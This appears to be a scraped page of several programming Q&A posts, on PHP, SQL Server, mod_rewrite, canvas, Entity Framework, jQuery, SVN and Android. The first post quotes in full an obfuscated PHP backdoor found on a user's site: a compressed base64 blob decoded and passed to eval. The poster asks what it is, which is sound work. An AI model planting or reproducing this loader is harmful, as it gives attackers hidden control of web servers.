  • Weird PHP file on my website

    - by sam
Today i noticed that there was a strange new file called "noivil.php" on my webspace. The contents of it are very long and I have no idea what it does! <?php $k='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';$r='YmFzZTY0X2RlY29kZQ==';$rr='WjNwMWJtTnZiWEJ5WlhOeg==';$rrr=base64_decode($r);$rrrr=$rrr($rrr($rr));eval($rrrr($rrr($k))); When I run it it just outputs some random stuff I don't understand. My questions: What is this? Where did it come from? Is it a virus/trojan? What does it exactly do? You are better at PHP than me, maybe you can tell what it is Thanks in advance

  • sql server - framework 4 - IIS 7 weird sort from db to page

    - by ila
I am experiencing a strange behavior when reading a resultset from database in a calling method. The sort of the rows is different from what the database should return. My farm: - database server: sql server 2008 on a WinServer 2008 64 bit - web server: a couple of load balanced WinServer 2008 64 bit running IIS 7 The application runs on a v4.0 app pool, set to enable 32bit applications Here's a description of the problem: - a stored procedure is called, that returns a resultset sorted on a particular column - I can see thru profiler the call to the SP, if I run the statement I see correct sorting - the calling page gets the results, and before any further elaboration logs the rows immediately after the SP execution - the results are in a completely different order (I cannot even understand if they are sorted in any way) Some details on the Stored Procedure: - it is called by code using a SqlDatAdapter - it has also an output value (a count of the rows) that is read correctly - which sort field is to be used is passed as a parameter - makes use of temp tables to collect data and perform the desired sort Any idea on what I could check? Same code and same database work correctly in a test environment, 32 bit and not load balanced.

  • PHP static objects giving a fatal error

    - by Webbo
I have the following PHP code; <?php component_customer_init(); component_customer_go(); function component_customer_init() { $customer = Customer::getInstance(); $customer->set(1); } function component_customer_go() { $customer = Customer::getInstance(); $customer->get(); } class Customer { public $id; static $class = false; static function getInstance() { if(self::$class == false) { self::$class = new Customer; } else { return self::$class; } } public function set($id) { $this->id = $id; } public function get() { print $this->id; } } ?> I get the following error; Fatal error: Call to a member function set() on a non-object in ....../classes/customer.php on line 9 Can anyone tell me why I get this error? I know this code might look strange, but it's based on a component system that I'm writing for a CMS. The aim is to be able to replace HTML tags in the template e.g.; <!-- component:customer-login --> with; <?php component_customer_login(); ?> I also need to call pre-render methods of the "Customer" class to validate forms before output is made etc. If anyone can think of a better way, please let me know but in the first instance, I'd like to know why I get the "Fatal error" mentioned above. Cheers

  • If attacker has original data, and encrypted data, can they determine the passphrase?

    - by Brad Cupit
If an attacker has several distinct items (for example: e-mail addresses) and knows the encrypted value of each item, can the attacker more easily determine the secret passphrase used to encrypt those items? Meaning, can they determine the passphrase without resorting to brute force? This question may sound strange, so let me provide a use-case: User signs up to a site with their e-mail address Server sends that e-mail address a confirmation URL (for example: https://my.app.com/confirmEmailAddress/bill%40yahoo.com) Attacker can guess the confirmation URL and therefore can sign up with someone else's e-mail address, and 'confirm' it without ever having to sign in to that person's e-mail account and see the confirmation URL. This is a problem. Instead of sending the e-mail address plain text in the URL, we'll send it encrypted by a secret passphrase. (I know the attacker could still intercept the e-mail sent by the server, since e-mail are plain text, but bear with me here.) If an attacker then signs up with multiple free e-mail accounts and sees multiple URLs, each with the corresponding encrypted e-mail address, could the attacker more easily determine the passphrase used for encryption? Alternative Solution I could instead send a random number or one-way hash of their e-mail address (plus random salt). This eliminates storing the secret passphrase, but it means I need to store that random number/hash in the database. The original approach above does not require this extra table. I'm leaning towards the the one-way hash + extra table solution, but I still would like to know the answer: does having multiple unencrypted e-mail addresses and their encrypted counterparts make it easier to determine the passphrase used?

  • Apache mod_rewrite - forward domain root to subdirectory

    - by DuFace
I have what I originally assumed to be a simple problem. I am using shared hosting for my website (so I don't have access to the Apache configuration) and have only been given a single folder to store all my content in. This is all well and good but it means that all my subdomains must have their virtual document root's inside public_html, meaning they effectively become a folder on my main domain. What I'd like to do is organise my public_html something like this: public_html/ www/ index.php ... sub1/ index.php ... some_library/ ... This way, all my web content is still in public_html but only a small fraction of it will be served to the client. I can easily achieve this for all the subdomains, but it's the primary domain that I'm having issues with. I created a .htaccess file in public_html with the following: Options +SymLinksIfOwnerMatch # I'm not allowed to use FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_URI} !^/www [NC] RewriteRule ^(.*)$ /www/$1 [L] This works fairly well, but for some strange reason www.example.com/stuff is translated into a request for www.example.com/www/stuff and hence a 404 error is given. It was my understanding that unless an 'R' flag was specified, mod_rewrite was purely internal so I can't understand why the request is generated as that implies (to me at least) redirection. I assumed this would be a trivial problem to solve as all I actually want to do is forward all requests for the root of www.example.com to a subdirectory, but I've spent hours searching for answers and none are quite correct. I find it difficult to believe I'm the only person to have this issue. I apologise if this question has been answered on here before, I did search and trawl but couldn't find an appropriate answer. Please could someone shed some light on this?

  • Canvas maximization bug?

    - by mitjak
I must've killed over an hour on what seems to me like strange behaviour that happens in Firefox, Safari and Chrome. Here is some code: <!doctype html> <html> <head> <title>Watch me grow scrollbars!</title> </head> <body onload="resizeCanvas()"> <canvas id="canvas"></canvas> </body> </html> <script type="application/javascript"> function resizeCanvas() { var canvas = document.getElementById("canvas"); canvas.setAttribute("height", window.innerHeight); canvas.setAttribute("width", window.innerWidth); } </script> Basically, the canvas always seems to maximize 'too much', and the window grows scrollbars on both sides. I've tried using various ways of obtaining the document dimensions, including nesting canvas in a 100% wide & tall absolutely positioned div, as well as extracting the document.documentElement.clientWidth/Height properties. Just to be sure I'm not going insane, I've placed an image in place of the canvas, and voila, the same code worked perfectly to stretch the image out to document dimensions. What am I doing wrong here? I'm too tired to understand. Must.. drink.. something.

  • Entity framework self referencing loop detected

    - by Lyd0n
I have a strange error. I'm experimenting with a .NET 4.5 Web API, Entity Framework and MS SQL Server. I've already created the database and set up the correct primary and foreign keys and relationships. I've created a .edmx model and imported two tables: Employee and Department. A department can have many employees and this relationship exists. I created a new controller called EmployeeController using the scaffolding options to create an API controller with read/write actions using Entity Framework. In the wizard, selected Employee as the model and the correct entity for the data context. The method that is created looks like this: // GET api/Employee public IEnumerable<Employee> GetEmployees() { var employees = db.Employees.Include(e => e.Department); return employees.AsEnumerable(); } When I call my API via /api/Employee, I get this error: ...The 'ObjectContent`1' type failed to serialize the response body for content type 'application/json; ...System.InvalidOperationException","StackTrace":null,"InnerException":{"Message":"An error has occurred.","ExceptionMessage":"Self referencing loop detected with type 'System.Data.Entity.DynamicProxies.Employee_5D80AD978BC68A1D8BD675852F94E8B550F4CB150ADB8649E8998B7F95422552'. Path '[0].Department.Employees'.","ExceptionType":"Newtonsoft.Json.JsonSerializationException","StackTrace":" ... Why is it self referencing [0].Department.Employees? That doesn't make a whole lot of sense. I would expect this to happen if I had circular referencing in my database but this is a very simple example. What could be going wrong?

  • jQuery .ajax method executing but not firing error (or success)

    - by John Swaringen
I'm having a very strange situation. I have a .NET Web Service (.asmx) that I'm trying to call via jQuery ajax to populate some <select></select>'s. The service is running System.Web.Services like it's supposed to and should be returning a JSON list. At least that's the way I understand that it will in .NET 3.5/4.0. The main problem is that the .ajax() function (below) seems to execute but the internal callbacks aren't executing. I know it's executing because I can do something before and after the function and both execute, so JavaScript isn't blowing up. $.ajax({ type: "POST", contentType: "application/json; charset=utf-8", url: 'http://localhost:59191/AFEDropDownService/Service.asmx/GetAVP', data: "{}", dataType: "jsonp", crossDomain: true, success: function(list) { console.log(list); console.log("success!!"); }, error: function(msg) { console.log("error: " + msg.text); } }); If you need more of the code let me know. Or if you know a better way as I'm trying to build cascading <select></select's.

  • How does SVN store commit time

    - by Salman
I am working on a project that involves extracting details from a SVN server using SVNKit. My project is already complete and has been working we for a while now. During the testing, I noticed something rather very strange. the Commit Times my extract data seems is alway different from whats there in SVN Logs. I couldnt find any code in my project that could be inducing this difference but now I am looking as to how SVN server stores the Commit time in itself. As we have developer working from different part of the world thus resulting in different timezones, I was thinking that SVN might be storing time after converting them to GMT or timezone of the system on which SVN server is running. But that does not seem to be happening. Instead the times are stored as per the time when the commit was done and in that local timezone itself. I have been unable to find any substantial document on internet to support my theory so far. Can anybody in brief explain as how SVN store the Commit Time for each change? Documentaion links referring to this will be of great help.

  • Uninstalling Android Application

    - by Sosukodo
When I create an Android project in Eclipse and send it to my device for debugging, the app works fine but when I try to uninstall it, I get a strange message. Below are the steps to recreate my problem: Eclipse Version: 4.2.0 Build id: I20120608-1400 ADT Version: 2.0.3 v201208082019-427395 Run Eclipse Click File-New-Project... Select Android/Android Application Project Click Next. Enter Application Name: Test Build SDK: Android 4.1 Minimum Required SDK: API 8 Android 2.2 Enable: Create custom launcher icon / Create project in workspace Click Next thrice. Click Finish. Connect 4.1 Android device to computer via USB. Click Run-Run from menu. Select "Android application" on popup the "Run As" popup. Click Ok. MainActivity application runs on device. Click the Back button on the Android device. Open applications on device and find "MainActivity" app. Long press the MainActivity icon and drag to trash. Here's the puzzling part: Instead of getting a standard Do you want to uninstall this app? I get a dialog with this text: MainActivity is part of the following app: Test Do you want to uninstall this app? Why do I get this message instead of the standard one? Why is MainActivity the name of the app when I specifically stated the name of the app is "Test"?

  • Problem finding the difference in days between two dates

    - by James
    I have been using a tidy little routine that I found here to calculate the difference in days between two dates in AS3. I am getting some strange results and I am wondering if any of you inter-codal-mega-lords can shed some light? Why is Q1 of 2010 coming up one day short, when in all other cases the routine is performing fine? Many thanks in advance to anyone who can help! function countDays( startDate:Date, endDate:Date ):int { var oneDay:int = 24*60*60*1000; // hours*minutes*seconds*milliseconds var diffDays:int = Math.abs((startDate.getTime() - endDate.getTime())/(oneDay)); return diffDays; } countDays( new Date( 2010, 00, 01 ), new Date( 2011, 00, 01 ) ); // returns 365, which is correct countDays( new Date( 2010, 00, 01 ), new Date( 2010, 03, 01 ) ); // returns 89, which is 1 day short countDays( new Date( 2010, 03, 01 ), new Date( 2010, 06, 01 ) ); // returns 91, which is correct countDays( new Date( 2010, 06, 01 ), new Date( 2010, 09, 01 ) ); // returns 92, which is correct countDays( new Date( 2010, 09, 01 ), new Date( 2011, 00, 01 ) ); // returns 92, which is correct

  • What could possibly be causing this NPE in onCreate?

    - by Adam Johns
I am getting an NPE in onCreate of the following file (MySubActivity): public class MySubActivity extends MySuperActivity { @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); myTextView.setText(getResources().getString(R.string.myString)); } } MySuperActivity: public class MySuperActivity extends Activity { protected TextView myTextView; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.my_layout); myTextView = (TextView)findViewById(R.id.myTextViewid); } } The strange thing is that I have never seen this crash while testing the app. The page works fine when I test it. However I got a crash report from Google notifying me of the crash. I cannot reproduce it, and I have no idea under what scenario this crash could happen. Seeing as how it works for me, the resource ids and string names etc. must be correct. The only thing that came across my mind was that maybe the user had their phone set to a different language, so it couldn't properly pull the resources. However, there are default resources for all of them, and I tested changing the language of my emulator and it didn't crash. Any ideas?

  • Listening socket

    - by hoodoos
I got a strange problem, I never actually expirienced this before, here is the code of the server (client is firefox in this case), the way I create it: _Socket = new Socket( AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp ); _Socket.Bind( new IPEndPoint( Settings.IP, Settings.Port ) ); _Socket.Listen( 1000 ); _Socket.Blocking = false; the way i accept connection: while( _IsWorking ) { if( listener.Socket.Poll( -1, SelectMode.SelectRead ) ) { Socket clientSocket = listener.Socket.Accept(); clientSocket.Blocking = false; clientSocket.SetSocketOption( SocketOptionLevel.Tcp, SocketOptionName.NoDelay, true ); } } So I'm expecting it hang on listener.Socket.Poll till new connection comes, but after first one comes it hangs on poll forever. I tried to poll it constantly with smaller delay, let's say 10 microseconds, then it never goes in SelectMode.SelectRead. I guess it maybe somehow related on client's socket reuse? Maybe I don't shutdown client socket propertly and client(firefox) decides to use an old socket? I disconnect client socket this way: Context.Socket.Shutdown( SocketShutdown. Both ); // context is just a wrapper around socket Context.Socket.Close(); What may cause that problem?

  • CREATE VIEW called multiple times not creating all views

    - by theninepoundhammer
Noticing strange behavior in SQL 2005, both Express and Enterprise Edition: In my code I need to loop through a series of values (about five in a row), and for each value, I need to insert the value into a table and dynamically create a new view using that value as part of the where clause and the name of the view. The code runs pretty quickly, but what I'm noticing is that all the values are inserted into the table correctly but only the LAST view is being created. Every time. For example, if the values I'm using are X1, X2, X3, X4, and X5, I'll run the process, open up Mgmt Studio, and see five rows in the table with the correct five values, but only one view named MyView_x5 that has the correct WHERE clause. At first, I had this loop in an SSIS package as part of a larger data flow. When I started noticing this behavior, I created a stored proc that would create the CREATE VIEW statement dynamically after the insert and called EXECUTE to create the view. Same result. Finally, I created some C# code using the Enterprise Library DAAB, and did the insert and CREATE VIEW statements from my DLL. Same result every time. Most recently, I turned on Profiler while running against the Enterprise Edition and was able to verify that the Batch Started and Batch Completed events were being fired off for each instance of the view. However, like I said, only the last view is actually being created. Does anyone have any idea why this might be happening? Or any suggestions about what else to check or profile? I've profiled for error messages, exceptions, etc. but don't see any in my trace file. My express edition is 9.00.1399.06. Not sure about the Enterprise edition but think it is SP2.

  • How to compensate the flipped coordinate system of core graphics for easy drawing?

    - by mystify
It's really a pain, but always when I draw an UIImage in -drawRect:, it's upside-down. When I flip the coordinates, the image draws correctly, but at the cost of all other CG functions drawing "wrong" (flipped). What's your strategy when you have to draw images and other things? Is there any rule of thumb how to not get stuck in this problem over and over again? Also, one nasty thing when I flip the y-axis is, that my CGRect from the UIImageView frame is wrong. Instead of the origin appearing at 10,10 upper left as expected, it appears at the bottom. But at the same time, all those normal line drawing functions of CGContext take correct coordinates. drawing a line in -drawRect with origin 10,10 upper left, will really start at upper left. But at the same time that's strange, because core graphics actually has a flipped coordinate system with y 0 at the bottom. So it seems like something is really inconsistent there. Drawing with CGContext functions takes coordinates as "expected" (cmon, nobody thinks in coordinates starting from bottom left, that's silly), while drawing any kind of image still works the "wrong" way. Do you use helper methods to draw images? Or is there anything useful that makes image drawing not a pain in the butt?

  • RegQueryValueEx not working with a Release version but working fine with Debug

    - by Nux
Hi. I'm trying to read some ODBC details form a registry and for that I use RegQueryValueEx. The problem is when I compile the release version it simply cannot read any registry values. The code is: CString odbcFuns::getOpenedKeyRegValue(HKEY hKey, CString valName) { CString retStr; char *strTmp = (char*)malloc(MAX_DSN_STR_LENGTH * sizeof(char)); memset(strTmp, 0, MAX_DSN_STR_LENGTH); DWORD cbData; long rret = RegQueryValueEx(hKey, valName, NULL, NULL, (LPBYTE)strTmp, &cbData); if (rret != ERROR_SUCCESS) { free(strTmp); return CString("?"); } strTmp[cbData] = '\0'; retStr.Format(_T("%s"), strTmp); free(strTmp); return retStr; } I've found a workaround for this - I disabled Optimization (/Od), but it seems strange that I needed to do that. Is there some other way? I use Visual Studio 2005. Maybe it's a bug in VS? Almost forgot - the error code is 2 (as the key wouldn't be found).

  • Xcode Code Sense horribly broken?

    - by Philippe Leybaert
Ever since I started using Xcode, I've experienced extremely annoying problems using Xcode and Code Sense. The problem is that when Code Sense kicks in for code completion, sometimes the source code text below the line I'm working on goes "crazy". If I continue typing, the problem gets worse, and after a while the source code is completely screwed up (funny colors, missing lines and characters, ...). Strange enough, the source code itself is unaffected, because when I select another source file and then go back to the one I was working on, everything looks fine again. The problem can be seen in this screencast: http://www.screencast.com/t/OGY3NWE5 Interesting facts: This problem has occurred on 3 different machines, so it's not related to a corrupt installation. Sometimes it's fine for a while (up to one hour) after launching Xcode, but once it starts happening, it's getting worse and worse, until Xcode is restarted. Then it's fine again (for a while) I've searched the web for similar experiences, and I can't find anything. I would think that it is a known problem, since it occurs on 3 different Macs here (both running 10.5 and 10.6). Anyone having the same problems? Or a suggestion for fixing this?

  • RewriteRule to store thousands of files in subdirectories

    - by Brandon
I have a website that will have millions of pages in a directory. I'd like to store those files on-disk in a bunch of subdirectories based on the first characters of the page name. For example http://mysite.com/hugedir/somefile.html would be stored in /var/www/html/hugedir/s/o/m/e/f/ile.html That is fairly trivial to do with a RewriteRule like so: RewriteRule ^hugedir/(.)(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}/$6.html RewriteRule ^hugedir/(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}.html RewriteRule ^hugedir/(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}.html RewriteRule ^hugedir/(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}.html RewriteRule ^hugedir/(.)(.*).html /hugedir/{$1}/{$2}.html RewriteRule ^hugedir/(.*).html /hugedir/{$1}.html However, the file name may contain hyphens or other non-standard characters and I'd really like to avoid having a directory named with a strange character. Ideally, I'd like to have a list of 'approved' characters and either eliminate or transform the unapproved characters to an underscore. Can anybody think of a way to do that? Or something else equivalent? Part of the requirement is that these be physical files on disk and it not be parsed with a scripting language.

  • [php] Firefox refreshes page 1, even after redirection to page 2

    - by Znarkus
Hi! This is a quite weird and annoying problem, which is reproduced with the script below. Say we have two pages: script.php and script.php?second. Page 1 creates some database entries and redirects to page 2. On page 2, the user is presented with an editor for said entries. If page 1 for some reason crashes on the first try, and prints some error message, a strange thing will happend. If we refresh page 1 (and this time it redirects fine), every consecutive refresh (of page 2) will actually refresh page 1 and again redirect to page 2. In the above example this would create new database entries for every refresh, which is the problem I want to circumvent by redirecting to page 2. <?php header('Content-type: text/plain'); session_start(); if (!isset($_GET['second'])) { $_SESSION['counter'] = isset($_SESSION['counter']) ? $_SESSION['counter'] + 1 : 1; /*$_SESSION['counter'] = 0; exit('asd');*/ header("Location: {$_SERVER['PHP_SELF']}?second", true, 303); exit; } echo "Counter: {$_SESSION['counter']}"; To try the above complete script, first run it with the commented code intact, then by enabling the commented code. I've tried 301, 302 and 303 redirections. Does someone know why this is happening?

  • JavaScript: How is "function x() {}" different from "x = function() {}" ?

    - by jleedev
In the answers to this question, we read that function f() {} defines the name locally, while [var] f = function() {} defines it globally. That makes perfect sense to me, but there's some strange behavior that's different between the two declarations. I made an HTML page with the script onload = function() { alert("hello"); } and it worked as expected. When I changed it to function onload() { alert("hello"); } nothing happened. (Firefox still fired the event, but WebKit, Opera, and Internet Explorer didn't, although frankly I've no idea which is correct.) In both cases (in all browsers), I could verify that both window.onload and onload were set to the function. In both cases, the global object this is set to the window, and I no matter how I write the declaration, the window object is receiving the property just fine. What's going on here? Why does one declaration work differently from the other? Is this a quirk of the JavaScript language, the DOM, or the interaction between the two?

  • In Java, is there a gain in using interfaces for complex models?

    - by Gnoupi
The title is hardly understandable, but I'm not sure how to summarize that another way. Any edit to clarify is welcome. I have been told, and recommended to use interfaces to improve performances, even in a case which doesn't especially call for the regular "interface" role. In this case, the objects are big models (in a MVC meaning), with many methods and fields. The "good use" that has been recommended to me is to create an interface, with its unique implementation. There won't be any other class implementing this interface, for sure. I have been told that this is better to do so, because it "exposes less" (or something close) to the other classes which will use methods from this class, as these objects are referring to the object from its interface (all public method from the implementation being reproduced in the interface). This seems quite strange to me, as it seems like a C++ use to me (with header files). There I see the point, but in Java? Is there really a point in making an interface for such unique implementation? I would really appreciate some clarifications on the topic, so I could justify not following such kind of behavior, and the hassle it creates from duplicating all declarations.

  • TableLayout formatting loss after device rotation

    - by roundhill
I'm seeing a strange issue with a TableLayout after the device is rotated from either orientation. If you load the view in either portrait or landscape mode, the table loads fine. But once you rotate the device, the columns collapse to just fit their width. I would expect that after rotation, the columns would still stretch to fit the width of the screen. Any ideas on what can be done to resolve this? Screenies and layout code below. Before Rotation: After Rotation: Table Layout: <TableLayout android:id="@+id/dataTable" android:layout_width="fill_parent" android:layout_height="fill_parent" android:layout_weight="1" android:layout_below="@id/chart" android:stretchColumns="*" android:shrinkColumns="*" android:padding="6dip" > </TableLayout> Table Row: <TableRow xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent"> <TextView android:id="@+id/col1" android:layout_marginRight="2dip" android:textColorLink="#FF21759b" android:text="Column 1" android:padding="4dip" android:textColor="#FF464646"/> <TextView android:id="@+id/col2" android:text="Column 2" android:textColor="#FF464646" android:padding="4dip"/> </TableRow> Thanks!

  • jQuery slideDown + CSS Floats

    - by danilo
I'm using a HTML Table with several rows. Every second row - containing details about the preceding row - is hidden using CSS. When clicking the first row, the second row gets showed using jQuery show(). This is quite nice, but I would prefer the slideDown-Effect. The problem is, inside the details row, there are two floating DIVs, one floating on the left, and one on the right. Now if i slideDown the previously hidden row, the contained DIVs behave strange and "jump around". See this animated gif to understand what I mean: http://ich-wars-nicht.ch/tmp/lunapic_127365879362365_.gif The markup: <tr class="row-vm"> <td>...</td> ... </tr> <tr class="row-details"> <td colspan="8"> <div class="vmdetail-left"> ... </div> <div class="vmdetail-right"> ... </div> </td> </tr> The CSS: .table-vmlist tr.row-details { display: none; } div.vmdetail-left { float: left; width: 50%; } div.vmdetail-right { float: right; width: 50%; } And the jQuery code: if ($(this).next().css('display') == 'none') { // Show details //$(this).next().show(); $(this).next().slideDown(); } else { // Hide details //$(this).next().hide(); $(this).next().slideUp(); } Is there a way to fix this behavior, and to implement a nice slideDown-effect?

  • Spinner setonitemselectedlistener is not called

    - by Gabrielle
I have a strange problem. I need to do something when an item from spinner is selected. Here is my code : language = (Spinner) findViewById(R.id.current_language_text); ArrayAdapter adapter = new ArrayAdapter(this, com.Orange.R.layout.my_spinner_textview, languages); adapter.setDropDownViewResource(com.Orange.R.layout.multiline_spinner_dropdown_item); language.setAdapter(adapter); language.setSelection(Integer.valueOf(language_id) - 1); language.setOnItemSelectedListener(new OnItemSelectedListener() { @Override public void onItemSelected(AdapterView<?> parentView, View selectedItemView, int position, long id) { System.out.println("position "+position); Toast.makeText(Settings.this, "Hello Toast",Toast.LENGTH_SHORT).show(); } @Override public void onNothingSelected(AdapterView<?> parentView) { // your code here } }); The problem is that onItemSelectedListener is not called. I put System.out.println in onItemSelected() but I don't get it in LogCat. I tried with Toast, and I get the same, it doesn't appear. Every time I select an item from spinner, in LogCat I get this warning : Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@2b1dabd0 Any idea why onItemSelectedListener is not called ?
